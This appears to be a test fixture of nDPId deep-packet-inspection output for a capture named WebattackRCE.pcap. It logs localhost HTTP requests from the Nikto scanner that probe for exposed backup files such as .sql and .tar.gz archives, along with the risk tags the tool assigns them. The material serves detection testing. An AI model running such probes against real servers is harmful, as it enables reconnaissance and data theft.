+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1576420276910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276910,"pkt":"AAAAAAAAAAAAAAAACABFAADDPvVAAEAG\/T1\/AAABfwAAAcK+H5Bg7Aa5zb6cN4AYAED+twAAAQEICp1m+9adZvvWR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1576420276912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276912,"pkt":"AAAAAAAAAAAAAAAACABFAADDm5RAAEAGoJ5\/AAABfwAAAcLAH5Ba3KPftqtSlIAYAED+twAAAQEICp1m+9edZvvXR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1576420276913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276913,"pkt":"AAAAAAAAAAAAAAAACABFAADCN0tAAEAGBOl\/AAABfwAAAcLCH5DYOQ8GBjLTAIAYAED+tgAAAQEICp1m+9mdZvvZR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1576420276916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276916,"pkt":"AAAAAAAAAAAAAAAACABFAADCczVAAEAGyP5\/AAABfwAAAcLEH5BP20t\/\/3FheoAYAED+tgAAAQEICp1m+9ydZvvcR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1576420276917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276917,"pkt":"AAAAAAAAAAAAAAAACABFAADDZ9VAAEAG1F1\/AAABfwAAAcLGH5AZz1+f4E8iK4AYAED+twAAAQEICp1m+92dZvvdR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1576420276919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276919,"pkt":"AAAAAAAAAAAAAAAACABFAADDxTFAAEAGdwF\/AAABfwAAAcLIH5D+g\/1jHP616oAYAED+twAAAQEICp1m+9+dZvveR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1576420276920,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276920,"pkt":"AAAAAAAAAAAAAAAACABFAADFpeFAAEAGlk9\/AAABfwAAAcLKH5AnGp2SsuR1gYAYAED+uQAAAQEICp1m++CdZvvgR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1576420276922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276922,"pkt":"AAAAAAAAAAAAAAAACABFAADFIE9AAEAGG+J\/AAABfwAAAcLMH5CC7hgEsmCzLIAYAED+uQAAAQEICp1m++KdZvviR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1576420276924,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276924,"pkt":"AAAAAAAAAAAAAAAACABFAADFRxNAAEAG9R1\/AAABfwAAAcLOH5BdCH9f1fkuqIAYAED+uQAAAQEICp1m++SdZvvjR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1576420276925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276925,"pkt":"AAAAAAAAAAAAAAAACABFAADFQzdAAEAG+Pl\/AAABfwAAAcLQH5BEXHt7s07ta4AYAED+uQAAAQEICp1m++WdZvvlR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1576420276926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276926,"pkt":"AAAAAAAAAAAAAAAACABFAADIWd1AAEAG4lB\/AAABfwAAAcLSH5AL0mGV2bYy0oAYAED+vAAAAQEICp1m++adZvvmR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 